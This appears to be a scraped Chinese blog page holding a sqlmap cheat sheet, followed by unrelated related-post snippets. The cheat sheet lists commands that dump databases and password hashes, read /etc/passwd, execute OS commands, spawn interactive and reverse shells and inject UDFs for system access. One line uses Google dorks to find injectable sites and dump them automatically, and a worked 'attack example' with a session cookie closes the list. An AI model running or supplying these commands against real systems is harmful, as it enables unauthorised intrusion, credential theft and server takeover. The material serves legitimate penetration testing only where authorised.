2. 程式人生 > >Sqlmap使用指南(五)

Sqlmap使用指南(五)

阿新 發佈:2019-02-10

本文是使用指南四的簡化版
基本步驟
sqlmap -u “http://url/news?id=1” –current-user #獲取當前使用者名稱稱
sqlmap -u “http://www.xxoo.com/news?id=1” –current-db #獲取當前資料庫名稱
sqlmap -u “http://www.xxoo.com/news?id=1” –tables -D “db_name” #列表名
sqlmap -u “http://url/news?id=1” –columns -T “tablename” users-D “db_name” -v 0 #列欄位
sqlmap -u “http://url/news?id=1

” –dump -C “column_name” -T “table_name” -D “db_name” -v
0 #獲取欄位內容
資訊獲取
sqlmap -u “http://url/news?id=1” –smart –level 3 –users # smart 智慧 level 執行測試等級sqlmap -u “http://url/news?id=1” –dbms “Mysql” –users # dbms 指定資料庫型別
sqlmap -u “http://url/news?id=1” –users #列資料庫使用者
sqlmap -u “http://url/news?id=1” –dbs#列資料庫
sqlmap -u “
http://url/news?id=1” –passwords #資料庫使用者密碼
sqlmap -u “http://url/news?id=1” –passwords-U root -v 0 #列出指定使用者資料庫密碼
sqlmap -u “http://url/news?id=1” –dump -C “password,user,id” -T “tablename” -D “db_name”
–start 1 –stop 20 #列出指定欄位,列出 20 條
sqlmap -u “http://url/news?id=1” –dump-all -v 0 #列出所有資料庫所有表
sqlmap -u “http://url/news?id=1
” –privileges #檢視許可權
sqlmap -u “http://url/news?id=1” –privileges -U root #檢視指定使用者許可權
sqlmap -u “http://url/news?id=1” –is-dba -v 1 #是否是資料庫管理員
sqlmap -u “http://url/news?id=1” –roles #列舉資料庫使用者角色
sqlmap -u “http://url/news?id=1” –udf-inject #匯入使用者自定義函式(獲取系統許可權!)
sqlmap -u “http://url/news?id=1” –dump-all –exclude-sysdbs -v 0 #列出當前庫所有表
sqlmap -u “http://url/news?id=1” –union-cols #union 查詢表記錄
sqlmap -u “http://url/news?id=1” –cookie “COOKIE_VALUE” #cookie 注入
sqlmap -u “http://url/news?id=1” -b #獲取 banner 資訊
sqlmap -u “http://url/news?id=1” –data “id=3” #post 注入
sqlmap -u “http://url/news?id=1” -v 1 -f #指紋判別資料庫型別
sqlmap -u “http://url/news?id=1” –proxy”http://127.0.0.1:8118” #代理注入
sqlmap -u “http://url/news?id=1“–string”STRING_ON_TRUE_PAGE” #指定關鍵詞
sqlmap -u “http://url/news?id=1” –sql-shell #執行指定 sql 命令
sqlmap -u “http://url/news?id=1” –file /etc/passwd
sqlmap -u “http://url/news?id=1” –os-cmd=whoami #執行系統命令sqlmap -u “http://url/news?id=1” –os-shell #系統互動 shell
sqlmap -u “http://url/news?id=1” –os-pwn #反彈 shell
sqlmap -u “http://url/news?id=1” –reg-read #讀取 win 系統登錄檔
sqlmap -u “http://url/news?id=1” –dbs-o “sqlmap.log” #儲存進度
sqlmap -u “http://url/news?id=1” –dbs -o “sqlmap.log” –resume #恢復已儲存進度
sqlmap -g “google 語法” –dump-all –batch #google 搜尋注入點自動 跑出所有欄位
攻擊例項:
sqlmap -u “http://url/news?id=1&Submit=Submit” –cookie=”PHPSESSID=41aa833e6d0d
28f489ff1ab5a7531406” –string=”Surname” –dbms=mysql –users –password

相關推薦

Sqlmap使用指南

本文是使用指南四的簡化版 基本步驟 sqlmap -u “http://url/news?id=1” –current-user #獲取當前使用者名稱稱 sqlmap -u “http://www.xxoo.com/news?id=1” –current-

小橙書閱讀指南——歸並排序的兩種實現

system .so generator tor ide ret style 鏈接 步長 算法描述:將兩個較小的有序數組合並成為一個較大的有序數組是比較容易的事情。我們只需要按照相同的順序依次比較最左側的元素,然後交替的放進新數組即可。這就是自頂向下的歸並排序的實現思路。與

Apache mina2 使用者指南過濾器

IoFilter 扮演著很重要角色,它是 MINA 的核心結構之一。它過濾 IoService 和 IoHandler 之間的所有 I/O 事件和請求。如果你有網路應用程式設計的經驗,你完全可以把它當成 Servlet 過濾器的表兄弟。許多開箱即用的過濾器通過使用類似以下的

圖解HTTP權威指南 | HTTP快取

作者簡介 李先生(Lemon),高階運維工程師(自稱),SRE專家(目標),夢想在35歲買一輛保時捷。喜歡鑽研底層技術,認為底層基礎才是王道。一切新技術都離不開作業系統(CPU、記憶體、磁碟)、網路等。堅持輸入輸出,記錄自己學習的點滴,在平凡中堅持前行,總有一天會遇見不一樣的自己。公眾號:運維汪(ID

STM32開發筆記51:STM32F4+DP83848乙太網通訊指南系列:MAC+DMA配置

本章為系列指南的第五章,講述STM32F407上MAC層以及其DMA的配置。我們在第一章知識儲備章節說到,STM32F407會在168MHz主頻之外分配一定的時間釋放匯流排資料用來處理DMA,這其中就包含MAC層的DMA,複習一下STM32F4的匯流排架構圖,(圖片來自RM0090ST中文STM32

爬蟲入門系列:正則表示式完全指南

爬蟲入門系列目錄: 正則表示式處理文字有如疾風掃秋葉,絕大部分程式語言都內建支援正則表示式,它應用在諸如表單驗證、文字提取、替換等場景。爬蟲系統更是離不開正則表示式,用好正則表示式往往能收到事半功倍的效果。 介紹正則表示式前,先來看一個問題,下面這段文字來自豆瓣的某個網頁連結,我對內容

Python自學指南---基礎篇資料型別-Number

前一節中,我們對Python中的物件有了一個基本的瞭解。從本節開始,我們將分別瞭解不同型別的物件,並且對不同物件的特點,特別是物件有關的函式進行介紹。 本節將會介紹數字型別,也就是Number型別,在Python中是一種不可變型別。 5.1 整數 Python能

《技術人求職指南如何高效面試

作者:方騰飛  原文首發於極客時間 方 騰飛花名清英,併發網(ifeve.com)創始人,暢銷書《Java併發程式設計的藝術》作者,螞蟻金服技術專家。目前工作於支付寶微貸

Chrome開發者工具不完全指南、移動篇

  前面介紹了Chrome開發者工具的大部分內容工具,現在介紹最後兩塊功能Audits和Console面板。一、Audits  Audits面板會針對目前網頁提出若干條優化的建議,這些建議分為兩大類,一類是網路載入效能,另一類是介面效能。首先開下它的主介面。  Audits面板的網路優化建議參照的是雅虎前端工

ffmpeg實戰教程libswscale,libavfilter實踐指南

1.libswscale實現YUV轉RGBlibswscale裡面實現了各種影象畫素格式的轉換。libswscale使用起來很方便,最主要的函式只有3個: (1) sws_getContext():使用引數初始化SwsContext結構體。 (2) sws_scale():轉

張高興的 .NET Core IoT 入門指南串列埠通訊入門

在開始之前,首先要說明的是串列埠通訊所用到的 SerialPort 類並不包含在 System.Device.Gpio NuGet 包中,而是在 System.IO.Ports NuGet 包中。之所以在這裡介紹串列埠通訊,是因為在嵌入式中串列埠通訊是與其他裝置進行互動的一種重要方式,而且在某些沒有螢幕的裝

張高興的 .NET Core IoT 入門指南PWM 訊號輸出

什麼是 PWM 在解釋 PWM 之前首先來了解一下電路中訊號的概念,其中包括模擬訊號和數字訊號。模擬訊號是一種連續的訊號,與連續函式類似,在圖形上表現為一條不間斷的連續曲線。數字訊號為只能取有限個數值的訊號,比如計算機中的高電平(1)和低電平(0)。 PWM(Pulse Width Modulation)即

Flink入門——DataSet Api程式設計指南

Apache Flink Apache Flink 是一個兼顧高吞吐、低延遲、高效能的分散式處理框架。在實時計算崛起的今天,Flink正在飛速發展。由於效能的優勢和兼顧批處理,流處理的特性,Flink可能正在顛覆整個大資料的生態。 DataSet API 首先要想執行Flink,我們需要下載並解壓Fl

Python 接口測試

方式 img 思路 tag 會有 地址 api接口 pytho 自己 五:使用python進行組織編寫接口測試用例 接口測試其實就是幾個步驟。 拿到接口的url地址 查看接口是用什麽方式發送 添加請求頭,請求體 發送查看返回結果,校驗返回結果是否正確 明白了接口測試的測

Java多線程編程模式實戰指南:Two-phase Termination模式

增加 row throws mgr 額外 finally join table 還需 停止線程是一個目標簡單而實現卻不那麽簡單的任務。首先,Java沒有提供直接的API用於停止線程。此外,停止線程時還有一些額外的細節需要考慮,如待停止的線程處於阻塞(等待鎖)或者等待狀態(等

國家商用password基於SM2的軟件授權碼生成及校驗

clas 信息 ecp register 方法 序列號 mod 生成 pub 將公開密鑰算法作為軟件註冊算法的優點是Cracker非常難通過跟蹤驗證算法得到註冊機。以下。將介紹使用SM2國密算法進行軟件註冊的方法。 生成授權碼 選擇SM2橢圓曲線參數(P,a,b,N,

微信小程序,前端大夢想

deb value image 宋體 夢想 top 1-1 獲得 star 微信小程序之綜合應用-訪問網絡加載數據 移動端訪問網絡加載數據時必不可少的功能,本章將接入豆瓣電影API,以列表的形式展現數據,支持下拉刷新及點擊查看詳情。重點包括: l 訪問網絡 l 跳轉畫面

從零開始學習html與瀏覽者交互,表單標簽——下

定位 開始 系統 isp ctr 程序 顯示 text 輸入 六、使用下拉列表框進行多選 1 <!DOCTYPE HTML> 2 <html> 3 <head> 4 <meta http-equiv="Content-T

python系列centos6.x中部署多個python版本

python pyenv centos6.x virtualenv 博主QQ:819594300博客地址:http://zpf666.blog.51cto.com/有什麽疑問的朋友可以聯系博主,博主會幫你們解答,謝謝支持!使用pyenv+virtualenv方式部署python多版本pyenv

C#基礎知識-函數的定義和調用

返回 {0} string 訪問修飾符 容器 列表 rdquo 所有 func 函數也可以稱為方法,可以很方便的把一些行為封裝到函數裏面,當調用這一函數時會把函數塊裏面的代碼按照順序執行,方法可以有多種形式,有無參數,有無返回值等。 1. 函數的定義 函數定